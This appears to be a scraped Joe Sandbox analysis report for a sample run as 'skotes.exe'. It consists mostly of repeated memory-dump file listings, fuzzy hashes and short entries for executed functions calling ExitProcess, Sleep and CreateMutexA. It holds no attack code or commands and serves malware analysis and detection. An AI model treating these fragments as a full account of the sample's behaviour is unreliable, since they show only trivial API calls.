Associated: 00000000.00000002.1745343678.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745361860.0000000000F47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745466862.00000000010A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745485019.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745540885.00000000010C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745556893.00000000010C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745573203.00000000010C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745589224.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745607377.00000000010D3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745624987.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745694561.00000000010EA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745723559.00000000010EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745741736.00000000010EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745757951.00000000010EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745774148.00000000010F0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745789726.00000000010F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745986530.00000000010F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746031892.0000000001119000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746052550.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746070041.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746087658.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746103198.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746124895.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746148174.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746165849.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746182948.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746200121.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746218114.0000000001153000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746237403.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746257527.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746280996.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746302295.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746324561.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746353330.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.0000000001190000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746419389.00000000011C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746439496.00000000011CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746456564.00000000011CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746477684.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746496265.00000000011D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746517608.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746537891.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: f6c4cefd26f5acf4ef1c1debe1e78bcc6c76cf8a793735f919334256bbaa4328
Instruction ID: 1de378412842c1e0cca1f84505c8350c8c4dc2dc64af4b2458f9b65010304412
Opcode Fuzzy Hash: f6c4cefd26f5acf4ef1c1debe1e78bcc6c76cf8a793735f919334256bbaa4328
Instruction Fuzzy Hash: 46A1E1B0A0124A9FDB20DF75C94479AB7E8FF15318F14512AE915F7341EB31EA06CB92

Analysis Process: skotes.exePID: 5764, Parent PID: 6908COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	602
Total number of Limit Nodes:	4

Executed Functions

Function 00F5652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00F5652A,?,?,?,?,?,00F57661), ref: 00F56567

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1c6f9d4fe744851176d677d469bd61b06b863a20e30d14ca69e0a08ba3e79dfe
Instruction ID: 7f84c51930e938f4d469a853593f68e44d2594d2e529de9dbe1ae1349b0c5106
Opcode Fuzzy Hash: 1c6f9d4fe744851176d677d469bd61b06b863a20e30d14ca69e0a08ba3e79dfe
Instruction Fuzzy Hash: E5E08634090148AEDF357F58CC19D487B5AEB51756F440804FE2487221DB29ED91EA80

Function 00F29BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5cc53b715f394f1a85ef35a2e477d82dbefb46fe1a8378d61a611db09e916fd1
Instruction ID: 90caf84ec5eea0194792ce2d35e40fb13f77e6a5e3bfe5fcd06e29ad61301612
Opcode Fuzzy Hash: 5cc53b715f394f1a85ef35a2e477d82dbefb46fe1a8378d61a611db09e916fd1
Instruction Fuzzy Hash: E1316D31A04214DBFB08DB78FC8976DB7A2EFC5320F244218E0149B3D6D7B99AC0A751

Function 00F29F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 560d5bd0d65c9e4dddf626593d6b84d749d824c28eb78c8ea4545fb225c585ee
Instruction ID: fe851a83fd289c872bc74ca392deb04d458146a11a8a57a485c760c4d0f09ec0
Opcode Fuzzy Hash: 560d5bd0d65c9e4dddf626593d6b84d749d824c28eb78c8ea4545fb225c585ee
Instruction Fuzzy Hash: 12315931A041149BFB18DB78ED897ADB7A2EFC5320F244219E014EB2D5D77A99C0A752

Function 00F2A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000001.00000002.1764469090.0000000000F20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764486811.0000000000F82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764632061.0000000000F89000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764651952.0000000000F8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1764699572.0000000000F97000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765407891.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765584405.00000000010F4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765652888.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765871305.0000000001116000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1765944083.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766080956.0000000001119000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766154075.000000000111A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766218614.0000000001123000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766318694.0000000001128000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766444780.000000000113A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766538376.000000000113B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766631836.000000000113E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1766711551.000000000113F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767052544.0000000001140000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767154042.0000000001141000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767197130.0000000001142000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767239174.0000000001169000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767255320.000000000116B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767273611.0000000001172000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767292973.0000000001179000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767312917.000000000117A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767352309.0000000001182000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767419167.0000000001194000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767479718.0000000001196000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767521370.000000000119E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767542098.00000000011A2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767578961.00000000011A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767644452.00000000011A7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767665829.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767712234.00000000011B0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767754474.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767771677.00000000011C0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767794038.00000000011DF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011E0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767809600.00000000011EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767848196.0000000001219000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767865409.000000000121A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767880642.000000000121B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767897134.000000000121F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767912523.0000000001221000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767929458.000000000122F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1767944890.0000000001230000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4fb87e2798f405f548301d133d098f919c498ba01a6630bc85094bc1b28a3364
Instruction ID: e538f196f1496b2156a979406be3c0738a984a6dfe953af9b8b47a10e1320ed8
Opcode Fuzzy Hash: 4fb87e2798f405f548301d133d098f919c498ba01a6630bc85094bc1b28a3364
Instruction Fuzzy Hash: 3F313B31B002149BEB18DB78ED8976DB7A2EFC1324F244218E4149B3D5D77A9980AB12

Function 00F2A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F2A963
CreateMutexA.KERNELBASE(00000000,00000000,00F83254), ref: 00F2A981

Memory Dump Source

Source File: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F20000, based on PE: true

